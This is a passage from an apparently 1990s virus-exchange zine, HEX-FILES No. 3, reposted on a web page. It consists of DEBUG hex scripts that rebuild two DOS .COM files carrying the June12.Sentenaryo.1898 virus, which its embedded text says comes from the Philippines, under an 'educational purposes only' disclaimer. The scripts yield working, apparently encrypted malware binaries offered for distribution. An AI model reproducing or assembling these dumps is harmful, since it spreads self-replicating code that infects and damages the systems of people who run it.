E 0250 20 74 68 69 73 20 70 72 6F 67 72 61 6D 20 62 65
E 0260 61 72 73 20 66 75 6C 6C 0D 0A 72 65 73 70 6F 6E
E 0270 73 69 62 69 6C 69 74 79 20 66 6F 72 20 68 69 73
E 0280 2F 68 65 72 20 61 63 74 69 6F 6E 73 2E 0D 0A 0A
E 0290 54 68 69 73 20 70 72 6F 67 72 61 6D 20 69 73 20
E 02A0 73 74 72 69 63 74 6C 79 20 66 6F 72 20 65 64 75
E 02B0 63 61 74 69 6F 6E 61 6C 20 6F 72 20 72 65 73 65
E 02C0 61 72 63 68 20 70 75 72 70 6F 73 65 73 20 6F 6E
E 02D0 6C 79 2E 0D 0A 0A 0A 24 08 20 1A 0E 1F BA 07 01
E 02E0 B4 09 CD 21 B4 4C CD 21 3B 64 58 0E 00 00 15 1A
E 02F0 19 1A 19 1A A7 1B A7 1B 35 1A 95 1B 35 1A 95 1B
E 0300 40 19 40 19 22 19 22 19 6B 19 38 19 6A 19 38 19
E 0310 3B 19 C4 19 3B 3B E4 E4 3B 19 31 1A 3B 18 C4 19
E 0320 3B 07 E4 E4 3B 11 C4 19 3B 03 E4 E4 3B 1E 47 1A
E 0330 A8 1A 34 1A 3B 1D C4 19 3B 0F E4 E4 3B 1F DF 1A
E 0340 DF 1A 14 1A DF 1A DF 1A 3B 1E 31 1A 3B 18 C4 09
E 0350 E4 E4 3B 1E 34 1A A8 1A 47 1A 3B 1D C7 19 3B 0F
E 0360 E4 E4 3B 11 C7 19 3B 03 E4 E4 3B 19 31 1A 3B 18
E 0370 C7 19 3B 07 E4 E4 3B 19 C7 19 3B 3B E4 E4 40 16
E 0380 3A 15 FF 10 40 16 D1 0A FF 10 83 11 1B 11 83 11
E 0390 FF 10 83 11 40 16 40 16 3A 15 FF 10 40 16 D1 0A
E 03A0 FF 10 83 11 1B 11 83 11 FF 10 37 1B 40 16 3A 15
E 03B0 40 16 FF 10 FF 10 D1 0A D1 0A FF 10 FF 10 D1 0A
E 03C0 D1 0A 83 11 74 12 F2 13 EA 1C F2 13 40 16 3A 15
E 03D0 40 16 FF 10 FF 10 D1 0A D1 0A FF 10 FF 10 D1 0A
E 03E0 D1 0A 83 11 1B 11 83 11 FF 10 83 11 FF 10 40 16
E 03F0 37 1B 40 16 C1 14 40 16 1B 11 1B 11 F2 13 F2 13
E 0400 EA 1C F2 13 1B 11 F2 13 EA 1C 65 1C EA 1C F2 13
E 0410 EA 1C 1B 11 F2 13 83 11 83 11 1B 11 37 1B 40 16
E 0420 37 1B 16 9B 9A 56 3B 5A 3B 59 3B 4E 3B 53 3B 5A
E 0430 3B 42 1B 1A 3B 1B 0D 9B 15 49 7E 6B 6E 79 77 72
E 0440 70 7A 3B 75 7C 3B 4B 72 77 72 6B 72 75 7A 68 1B
E 0450 06 9B 12 2A 23 22 23 3B 9B 15 31 3B 9B 14 52 70
E 0460 7A 36 2A 29 3B 75 7C 3B 53 6E 75 62 74 3B 9B 15
E 0470 31 9B 17 3B 2A 22 22 23 1B 1A 3B 1B 37 9B 15 50
E 0480 7A 77 7A 62 7A 7A 75 9B 1C 3B 3B 31 3B 3B 9B 97
E 0490 52 48 5A 55 5C 3B 9B 94 5F 5A 5A 55 5C 3B 9B 92
E 04A0 4F 5A 54 55 9B 1C 3B 3B 31 3B 3B 9B 15 50 7A 68
E 04B0 7A 69 72 75 77 7A 75 1B 1B 3C 9B 1F 50 7A 6B 7A
E 04C0 6F 72 7F 37 3B 7A 75 74 75 7C 3B 75 7A 7C 7A 6C
E 04D0 7A 3B 76 74 3B 6B 7A 69 7A 3B 68 7A 3B 79 7A 62
E 04E0 7A 75 24 1B 1B 6B 6A 0B 6B 65 6B 6A 0B 6B 6A 0B
E 04F0 6B 65 65 65 6B 6A 0B 6B 65 65 65 65 65 6B 65 6B
E 0500 5A 6B 65 65 65 6B 6F 5B 6B 6F 5B 6B 65 6B 6F 5B
E 0510 6B 6F 5B 17 12 18 17 17 1F 1F 1F 12 18 17 17 17
E 0520 12 18 17 17 1F 1F 1F 12 18 1F 1F 1F 12 18 12 18
E 0530 12 18 12 18 12 18 12 18 17 1F 1F 1F 12 18 12 18
E 0540 12 18 12 18 1F 1F 1F 1F 1F 1F 17 1F 1F 1F 17 17
E 0550 17 17 12 18 12 18 17 1F 1F 1F 17 17 17 12 18 3F
E 0560 17 03 1E 0E 1F BE 97 02 BD 74 07 8A 04 34 2B 88
E 0570 04 46 3B F5 75 F5 1F C3 2E 80 2E 8F 02 04 EB 04
E 0580 B4 4C CD 21 E8 DB FF D7 91 B3 32 9F 01 E6 0A AA
E 0590 D1 B3 33 5E 1B 9B 2B 21 EB 5E 39 2D 25 34 94 2B
E 05A0 2A 7C 2D 95 41 2C 92 21 2B D8 8F 34 E0 A7 EB 2E
E 05B0 3B 2B 90 2B 2B 28 F3 A5 F8 97 2B 2B 2E 1F 39 7B
E 05C0 93 2B 2B 7B E0 25 34 25 3C 97 1B 24 A7 EB 18 DD
E 05D0 ED 2D A4 29 2F 90 41 2C ED 2C D8 88 26 28 88 3A
E 05E0 28 88 3E 28 2E 3B 2B A5 EB 92 9D 28 A0 D5 EC 6C
E 05F0 2A 8E E0 2D 43 3C 28 D4 C8 4B 24 AB 2B 4E 24 77
E 0600 2B 4E 24 47 2B 4E 24 A7 E3 A5 FB A5 F3 93 0A 1E
E 0610 E6 0A A2 35 90 28 A7 2D 96 28 91 82 28 9F 0E E6
E 0620 0A 90 28 2A 9F 61 A5 2D 26 28 E6 0A 18 D4 90 22
E 0630 28 0D A0 6E 07 A2 2C A5 EB 92 D4 54 A0 EC D9 85
E 0640 85 5E D0 84 A0 FC 9F 60 2D 34 25 2C B7 05 D4 35
E 0650 90 28 25 3C 97 1B 24 9F 66 E6 0A 7B 05 A5 2D 22
E 0660 28 9F 62 E6 0A 73 9F 1A 91 28 2A E6 0A 7B 7D 18
E 0670 DD 9F 30 A1 2F 19 EF A3 2F 6D AA D5 59 29 5E D8
E 0680 75 73 E8 4B 9F 01 E6 0A AA D1 27 2D 5E 22 35 2D
E 0690 25 34 C3 FB 29 2C 34 4A E8 B7 AB D7 01 5F 3B 16
E 06A0 2B 60 5F 3E AB D7 16 5F 3B B6 C1 D3 6B 3A 2B AA
E 06B0 D1 B3 32 5E DF 9D 33 B6 E4 4B 35 2D C3 A8 28 22
E 06C0 6A F1 13 FF 8D D8 8C C0 D0 C1 64 01 D0 6A C4 13
E 06D0 FF 55 2C C1 84 6A 90 67 F9 DE 13 FF C1 84 6A C4
E 06E0 13 FF D0 C1 54 DA 54 0E DA 9E 6A E4 7D D4 D1 6A
E 06F0 E8 13 FF AC EE 29 3D 29 3F D5 0C AB DB E3 AA D9
E 0700 AC FD D0 D9 67 DD DE 53 A2 D7 60 5B DA 56 F0 78
E 0710 DC 8F 88 89 2D 78 81 80 87 AB F7 5E 1F DA F5 27
E 0720 91 2D 78 AB F8 37 27 DF 97 AD B7 B0 BF BF A7 B1
E 0730 AD FE B0 B7 FE 8E AB AA B1 B5 AD BF FE 95 BF A9
E 0740 BF A7 BF B0 60 52 DA 2D 78 AB 04 60 23 D0 61 D2
E 0750 D1 6F D3 2D 7A 66 FA EB 13 FF 6A FB 64 5F DB D8
E 0760 8D 8E 13 FF D0 D9 64 D4 D1 ED 17 66 DF 9D 13 FF
E 0770 AD D3 37 79 DF 9D 91 93 93 9F 90 9A 9B 86 9B 66
E 0780 DC E3 42 F0 21 C0 65 DD AC 36 4D 67 21 21 64 CE
E 0790 25 66 DC 9C 13 FF AD BE 37 B1 DF 88 36 10 20 EC
E 07A0 3A 13 C4 4C D2 DF 7C A0 DC 54 0E DC 1A D2 DF 7C
E 07B0 5C DD EC 1A D2 DF 7C 82 D9 54 2E 36 71 20 61 B0
E 07C0 D9 89 ED 28 67 B4 D9 2D 7A 60 E3 D5 63 7C D3 54
E 07D0 DA EC 18 56 DA 98 E5 2B AB 2B 60 DB D4 63 06 D0
E 07E0 5E E0 78 DC DE AB DD 5D 1B D4 54 DA EC 1C 56 DA
E 07F0 98 E5 2B AB 2B 81 80 1D 67 C3 DE 64 B0 D9 6A E1
E 0800 13 FF AC 4A 67 CD DE 55 24 60 5A DC 8F 88 89 2D
E 0810 78 81 80 87 AA 5C 5D 19 D4 2D 78 AA 29 36 8A DE
E 0820 6F C2 64 06 D0 6A E1 13 FF 55 2C 61 CE DE 66 93
E 0830 84 E7 DA AA 97 7F 27 D0 FA 2E DD 19 8E 1F 36 DA
E 0840 DD 19 7D A4 DB 36 8D 21 84 36 F4 DE 55 09 67 AA
E 0850 D9 6A 9E 13 FF AC D3 36 C4 DE 67 D4 DE 64 A9 DB
E 0860 6A 9E 13 FF 37 45 DE 52 16 DB F1 DE 8E B6 56 DC
E 0870 15 6E DE 11 ED 0C ED 17 66 DE 9C 13 FF 1D 7C 78
E 0880 DC ED 17 63 DE DC 55 9A D0 7D 1D DC 55 9A CE 7D
E 0890 14 DC 55 9A CA 7D 0F DC 55 9A C8 7D 13 DC 55 9A
E 08A0 DA E7 92 DC AA DF 96 29 3B DD 9A DC CD 0F 91 DD
E 08B0 19 CD 0F 99 FA 2E 8E 8C DB B4 D9 CD 0F 29 2B D5
E 08C0 0C AA DF 9E 57 9A DA 57 8A DC 84 86 8E 8C 29 29
E 08D0 F5 9A D6 57 9A C8 19 9A CA 56 DC DB A8 DE 57 9A
E 08E0 D0 57 B2 CE 36 6A 20 87 84 36 52 21 55 09 67 B4
E 08F0 D9 6A 9E 13 FF AC D5 36 A4 21 6F C2 55 08 6A 9E
E 0900 13 FF 66 DE 89 13 FF 9E 13 FF 6A E0 13 FF EC 33
E 0910 54 D0 2A D0 64 D4 D1 66 DF 9D 13 FF 86 84 C1 13
E 0920 FF 36 C0 DF 2C 34 4A AB D7 60 5E 28 C3 7F D6 C2
E 0930 5C D6 7A A1 E7 9F 22 E6 3B 72 E8 D5 ED 87 21 EB
E 0940 5F D3 99 7B 01 FB FB C1 9F 29 E6 3B 87 21 EB 5F
E 0950 C1 52 2E 87 A1 F3 C0 DF 9F 2A C3 FE D4 D5 E9 9F
E 0960 29 E6 3B C0 CC 93 28 2B E6 3B 25 34 9F 28 19 D4
E 0970 E6 3B 7A 9F 2A 92 2A 29 E6 3B C3 DB D7 D0 18 E2
E 0980 A1 D2 A1 DC 95 19 2A C3 9A D4 9D 38 C3 87 D4 91
E 0990 3D 22 95 0B 2B 94 DE 2A 92 22 2B 9F 29 E6 3B 86
E 09A0 17 D4 5F 21 29 FF A1 36 C3 AC D4 6C C0 C6 D5 ED
E 09B0 99 3D C9 CC 90 7B E8 A1 E8 CD 6B A1 EC CD 6B CF
E 09C0 4A 7B 92 23 2B A0 D2 64 FA CC A0 1E A0 56 3B 7A
E 09D0 C3 15 2B 72 C9 C4 73 CD 4A 19 EB CD 6B CD 6B 18
E 09E0 EB A5 F3 94 6B 2F ED 2E 2A 19 D4 18 F9 9F 29 E6
E 09F0 3B D1 8B 47 2F 27 2A 25 34 89 A9 28 C3 45 D7 93
E 0A00 2B 2C A1 D7 18 E2 91 64 33 E6 3B 72 9F 2A E6 3B
E 0A10 E8 A0 37 9B 9D CD 68 A0 E8 CD 69 AD CB CD 69 CF
E 0A20 4A 27 28 CD 4A A1 26 35 7D 18 EB A5 F3 95 6B 2F
E 0A30 A3 27 13 2F 5E D7 75 34 A8 ED 29 6C AB 17 07 5E
E 0A40 FB E8 35 25 34 95 E4 28 96 1F 2D 9F DE A1 2F 19
E 0A50 EF A3 2F 6D 10 DE 5E DE 34 E8 C2 F3 2A 26 0B 0B
E 0A60 0B 26 21 66

RCX
0964
W
Q

ÄÄ J12SENTA.SCR ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ



The virus in this infected file was compiled in A86 4.02.


ÄÄ J12SENTB.SCR STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

N J12SENTB.COM
E 0100 8C C8 05 2F 00 50 68 88 02 CB 61 62 75 68 61 79
E 0110 21 0D 0A 0A 54 68 69 73 20 69 73 20 4A 75 6E 65
E 0120 31 32 2E 53 65 6E 74 65 6E 61 72 79 6F 2E 31 38
E 0130 39 38 2E 42 20 76 69 72 75 73 20 63 6F 6D 69 6E
E 0140 67 20 74 6F 20 79 6F 75 20 66 72 6F 6D 20 74 68
E 0150 65 20 50 68 69 6C 69 70 70 69 6E 65 73 2E 0D 0A
E 0160 42 72 6F 75 67 68 74 20 74 6F 20 79 6F 75 20 6C
E 0170 69 76 65 20 62 79 20 48 45 58 2D 46 49 4C 45 53
E 0180 20 4E 6F 2E 20 33 0D 0A 0A 48 45 58 2D 46 49 4C
E 0190 45 53 20 61 6E 64 20 50 75 74 6F 6B 73 61 20 4B
E 01A0 61 77 61 79 61 6E 20 61 72 65 20 6E 6F 74 20 72
E 01B0 65 73 70 6F 6E 73 69 62 6C 65 20 66 6F 72 20 61
E 01C0 63 74 75 61 6C 2C 20 69 6D 70 6C 69 65 64 0D 0A
E 01D0 61 6E 64 2F 6F 72 20 69 6D 61 67 69 6E 61 72 79
E 01E0 20 64 61 6D 61 67 65 20 61 72 69 73 69 6E 67 20
E 01F0 64 69 72 65 63 74 6C 79 20 6F 72 20 69 6E 64 69
E 0200 72 65 63 74 6C 79 20 66 72 6F 6D 20 74 68 65 20
E 0210 75 73 65 2C 20 6D 69 73 75 73 65 0D 0A 6F 72 20
E 0220 6E 6F 6E 2D 75 73 65 20 6F 66 20 74 68 69 73 20
E 0230 70 72 6F 67 72 61 6D 2E 20 54 68 65 20 70 65 72
E 0240 73 6F 6E 20 77 68 6F 20 65 78 65 63 75 74 65 73
E 0250 20 74 68 69 73 20 70 72 6F 67 72 61 6D 20 62 65
E 0260 61 72 73 20 66 75 6C 6C 0D 0A 72 65 73 70 6F 6E
E 0270 73 69 62 69 6C 69 74 79 20 66 6F 72 20 68 69 73
E 0280 2F 68 65 72 20 61 63 74 69 6F 6E 73 2E 0D 0A 0A
E 0290 54 68 69 73 20 70 72 6F 67 72 61 6D 20 69 73 20
E 02A0 73 74 72 69 63 74 6C 79 20 66 6F 72 20 65 64 75
E 02B0 63 61 74 69 6F 6E 61 6C 20 6F 72 20 72 65 73 65
E 02C0 61 72 63 68 20 70 75 72 70 6F 73 65 73 20 6F 6E
E 02D0 6C 79 2E 0D 0A 0A 0A 24 08 20 1A 0E 1F BA 07 01
E 02E0 B4 09 CD 21 B4 4C CD 21 00 00 00 00 00 00 00 00
E 02F0 1B 18 1B 18 A5 19 A5 19 37 18 97 19 37 18 97 19
E 0300 42 1B 42 1B 20 1B 20 1B 69 1B 3A 1B 68 1B 3A 1B
E 0310 39 1B C6 1B 39 39 E6 E6 39 1B 33 18 39 1A C6 1B
E 0320 39 05 E6 E6 39 13 C6 1B 39 01 E6 E6 39 1C 45 18
E 0330 AA 18 36 18 39 1F C6 1B 39 0D E6 E6 39 1D DD 18
E 0340 DD 18 16 18 DD 18 DD 18 39 1C 33 18 39 1A C6 0B
E 0350 E6 E6 39 1C 36 18 AA 18 45 18 39 1F C5 1B 39 0D
E 0360 E6 E6 39 13 C5 1B 39 01 E6 E6 39 1B 33 18 39 1A
E 0370 C5 1B 39 05 E6 E6 39 1B C5 1B 39 39 E6 E6 42 14
E 0380 38 17 FD 12 42 14 D3 08 FD 12 81 13 19 13 81 13
E 0390 FD 12 81 13 42 14 42 14 38 17 FD 12 42 14 D3 08
E 03A0 FD 12 81 13 19 13 81 13 FD 12 35 19 42 14 38 17
E 03B0 42 14 FD 12 FD 12 D3 08 D3 08 FD 12 FD 12 D3 08
E 03C0 D3 08 81 13 76 10 F0 11 E8 1E F0 11 42 14 38 17
E 03D0 42 14 FD 12 FD 12 D3 08 D3 08 FD 12 FD 12 D3 08
E 03E0 D3 08 81 13 19 13 81 13 FD 12 81 13 FD 12 42 14
E 03F0 35 19 42 14 C3 16 42 14 19 13 19 13 F0 11 F0 11
E 0400 E8 1E F0 11 19 13 F0 11 E8 1E 67 1E E8 1E F0 11
E 0410 E8 1E 19 13 F0 11 81 13 81 13 19 13 35 19 42 14
E 0420 35 19 14 99 98 54 39 58 39 5B 39 4C 39 51 39 58
E 0430 39 40 19 18 39 19 0F 99 17 4B 7C 69 6C 7B 75 70
E 0440 72 78 39 77 7E 39 49 70 75 70 69 70 77 78 6A 19
E 0450 04 99 10 28 21 20 21 39 99 17 33 39 99 16 50 72
E 0460 78 34 28 2B 39 77 7E 39 51 6C 77 60 76 39 99 17
E 0470 33 99 15 39 28 20 20 21 19 18 39 19 35 99 17 52
E 0480 78 75 78 60 78 78 77 99 1E 39 39 33 39 39 99 95
E 0490 50 4A 58 57 5E 39 99 96 5D 58 58 57 5E 39 99 90
E 04A0 4D 58 56 57 99 1E 39 39 33 39 39 99 17 52 78 6A
E 04B0 78 6B 70 77 75 78 77 19 19 3E 99 1D 52 78 69 78
E 04C0 6D 70 7D 35 39 78 77 76 77 7E 39 77 78 7E 78 6E
E 04D0 78 39 74 76 39 69 78 6B 78 39 6A 78 39 7B 78 60
E 04E0 78 77 26 19 19 69 68 09 69 67 69 68 09 69 68 09
E 04F0 69 67 67 67 69 68 09 69 67 67 67 67 67 69 67 69
E 0500 58 69 67 67 67 69 6D 59 69 6D 59 69 67 69 6D 59
E 0510 69 6D 59 15 10 1A 15 15 1D 1D 1D 10 1A 15 15 15
E 0520 10 1A 15 15 1D 1D 1D 10 1A 1D 1D 1D 10 1A 10 1A
E 0530 10 1A 10 1A 10 1A 10 1A 15 1D 1D 1D 10 1A 10 1A
E 0540 10 1A 10 1A 1D 1D 1D 1D 1D 1D 15 1D 1D 1D 15 15
E 0550 15 15 10 1A 10 1A 15 1D 1D 1D 15 15 15 10 1A 3D
E 0560 15 01 1E 0E 1F BE 97 02 BD 74 07 8A 04 34 19 88
E 0570 04 46 39 EE 75 F5 1F C3 2E 80 2E 8F 02 04 EB 04
E 0580 B4 4C CD 21 E8 DB FF E5 A3 81 00 AD 33 D4 38 98
E 0590 E3 81 01 6C 29 A9 19 13 D9 6C 0B 1F 17 06 A6 19
E 05A0 18 4E 1F A7 73 1E A0 13 19 EA BD 06 D2 95 D9 1C
E 05B0 09 19 A2 19 19 18 DA 97 CA A5 19 19 1C 19 19 49
E 05C0 A1 39 16 49 D2 17 06 17 0E A5 29 16 95 D9 2A EF
E 05D0 DF 1F 96 1B 1D A2 73 1E DF 1E EA BA 14 1A BA 08
E 05E0 1A BA 0C 1A 1C 09 19 97 D9 A0 AF 1A 92 E7 DE 5E
E 05F0 18 BC D2 1F 71 0E 1A E6 FA 79 16 99 19 7C 16 45
E 0600 19 7C 16 75 19 7C 16 95 D1 97 C9 97 C1 A1 38 2C
E 0610 D4 38 90 07 A2 1A 95 1F A4 1A A3 B0 1A AD 3C D4
E 0620 38 A2 1A 18 AD 53 97 1F 14 1A D4 38 2A E6 A2 10
E 0630 1A 3F 92 5C 35 90 1E 97 D9 A0 E6 66 92 DE EB B7
E 0640 B7 6C E2 B6 92 CE AD 52 1F 06 17 1E 85 37 E6 07
E 0650 A2 1A 17 0E A5 29 16 AD 54 D4 38 49 37 97 1F 10
E 0660 1A AD 50 D4 38 41 AD 28 A3 1A 18 D4 38 49 4F 2A
E 0670 EF AD 00 93 1D 2B DD 91 1D 5F 98 E7 6B 1B 6C EA
E 0680 47 41 DA 79 AD 33 D4 38 98 E3 15 1F 6C 10 07 1F
E 0690 17 06 F1 C9 1B 1E 06 78 DA 85 99 E5 33 6D 09 24
E 06A0 19 52 6D 0C 99 E5 24 6D 09 84 F3 E1 59 08 19 98
E 06B0 E3 81 00 6C ED AF 01 84 D6 79 07 1F F1 9A 1A 02
E 06C0 4A D1 33 DF AD F8 AC E0 F0 E1 44 21 F0 4A E4 33
E 06D0 DF 77 28 E1 A4 4A B0 47 D9 FE 33 DF E1 A4 4A E4
E 06E0 33 DF F0 E1 74 FA 76 3C FA BE 4A C4 5D F4 F1 4A
E 06F0 C8 33 DF 8C CE 09 1D 09 1F F5 2C 8B FB C3 8A F9
E 0700 8C DD F0 F9 47 FD FE 73 82 F7 40 7B FA 76 D0 58
E 0710 FC AF A8 A9 0D 58 A1 A0 A7 8B D7 7E 3F FA D5 07
E 0720 B1 0D 58 8B D8 17 07 FF B7 8D 97 90 9F 9F 87 91
E 0730 8D DE 90 97 DE AE 8B 8A 91 95 8D 9F DE B5 9F 89
E 0740 9F 87 9F 90 40 72 FA 0D 58 8B 24 40 03 F0 41 F2
E 0750 F1 4F F3 0D 5A 46 DA CB 33 DF 4A DB 44 7F FB F8
E 0760 AD AE 33 DF F0 F9 44 F4 F1 CD 37 46 FF BD 33 DF
E 0770 8D F3 17 59 FF BD B1 B3 B3 BF B0 BA BB A6 BB 46
E 0780 FC C3 62 D0 01 E0 45 FD 8C 16 6D 47 01 01 44 EE
E 0790 05 46 FC BC 33 DF 8D 9E 17 91 FF A8 16 30 00 CC
E 07A0 1A 33 E4 6C F2 FF 5C 80 FC 76 3C FC 3A F2 FF 5C
E 07B0 7C FD CC 3A F2 FF 5C A2 F9 76 38 16 51 00 41 90
E 07C0 F9 A9 CD 08 47 94 F9 0D 5A 40 C3 F5 43 5C F3 74
E 07D0 FA CC 38 76 FA B8 C7 10 8B 0B 40 FB F4 43 26 F0
E 07E0 7E C0 58 FC FE 8B FD 7D 3B F4 74 FA CC 3C 76 FA
E 07F0 B8 C7 10 8B 0B A1 A0 3D 47 E3 FE 44 90 F9 4A C1
E 0800 33 DF 8C 6A 47 ED FE 75 04 40 7A FC AF A8 A9 0D
E 0810 58 A1 A0 A7 8A 7C 7D 39 F4 0D 58 8A 09 16 AA FE
E 0820 4F E2 44 26 F0 4A C1 33 DF 77 28 41 EE FE 46 B3
E 0830 A4 C7 FA 8A B7 5F 07 F0 DA 0E FF 06 AE 3F 16 FA
E 0840 FF 06 5D 84 FB 16 AD 01 A4 16 D4 FE 75 29 47 8A
E 0850 F9 4A BE 33 DF 8C F3 16 E4 FE 47 F4 FE 44 89 FB
E 0860 4A BE 33 DF 17 65 FE 72 36 FB D1 FE AE 96 76 FC
E 0870 35 4E FE 31 CD 2C CD 37 46 FE BC 33 DF 3D 5C 58
E 0880 FC CD 37 43 FE FC 75 BA F0 5D 3D FC 75 BA EE 5D
E 0890 34 FC 75 BA EA 5D 2F FC 75 BA E8 5D 33 FC 75 BA
E 08A0 FA C7 B2 FC 8A FF B6 09 1B FD BA FC EF 34 B1 FF
E 08B0 06 EF 34 B9 DA 0E AE AC FB 94 F9 EF 34 09 0B F5
E 08C0 2C 8A FF BE 77 BA FA 77 AA FC A4 A6 AE AC 09 09
E 08D0 D5 BA F6 77 BA E8 39 BA EA 76 FC FB 88 FE 77 BA
E 08E0 F0 77 92 EE 16 4A 00 A7 A4 16 72 01 75 29 47 94
E 08F0 F9 4A BE 33 DF 8C F5 16 84 01 4F E2 77 0C 4A BE
E 0900 33 DF 46 FE A9 33 DF BE 33 DF 4A C0 33 DF CC 13
E 0910 74 F0 0A F0 44 F4 F1 46 FF BD 33 DF A6 A4 E1 33
E 0920 DF 16 E0 FF 1E 06 78 99 E5 52 6C 1A F1 4D E4 F0
E 0930 6E E4 48 93 D5 AD 10 D4 09 40 DA E7 DF B5 13 D9
E 0940 6D E1 AB 49 33 C9 C9 F3 AD 1B D4 09 B5 13 D9 6D
E 0950 F3 60 1C B5 93 C1 F2 ED AD 18 F1 CC E6 E7 DB AD
E 0960 1B D4 09 F2 FE A1 1A 19 D4 09 17 06 AD 1A 2B E6
E 0970 D4 09 48 AD 18 A0 18 1B D4 09 F1 E9 E5 E2 2A D0
E 0980 91 D6 93 EE A7 2B 18 F1 A8 E6 AF 0A F1 B5 E6 A3
E 0990 0F 10 A7 39 19 A6 EC 18 A0 10 19 AD 1B D4 09 B4
E 09A0 25 E6 6D 13 1B CD 93 04 F1 9E E6 5E F2 F4 E7 DF
E 09B0 AB 0F FB FE A2 49 DA 93 DA FF 59 93 DE FF 59 FD
E 09C0 78 49 A0 11 19 90 D6 56 C8 FE 92 2C 92 64 09 48
E 09D0 F1 27 19 40 FB F6 41 FF 78 2B D9 FF 59 FF 59 2A
E 09E0 D9 97 C1 A6 59 1D DF 1C 18 2B E6 2A CB AD 1B D4
E 09F0 09 E3 B9 75 1D 15 18 17 06 BB 9B 1A F1 77 E5 A1
E 0A00 19 1E 93 E5 2A D0 A3 56 01 D4 09 40 AD 18 D4 09
E 0A10 DA 92 05 A9 AF FF 5A 92 DA FF 5B 9F DD FF 5B FD
E 0A20 78 15 1A FF 78 93 14 07 4F 2A D9 97 C1 A7 59 1D
E 0A30 91 15 21 1D 6C E5 47 06 9A DF 1B 5E 99 25 35 6C
E 0A40 C9 DA 07 17 06 A7 D6 1A A4 2D 1F AD FE 93 1D 2B
E 0A50 DD 91 1D 5F 20 F7 6C EC 06 DA F0 C1 18 14 39 39
E 0A60 39 14 13 54

RCX
0964
W
Q

ÄÄ J12SENTB.SCR ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ





-=<HF3>=-

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT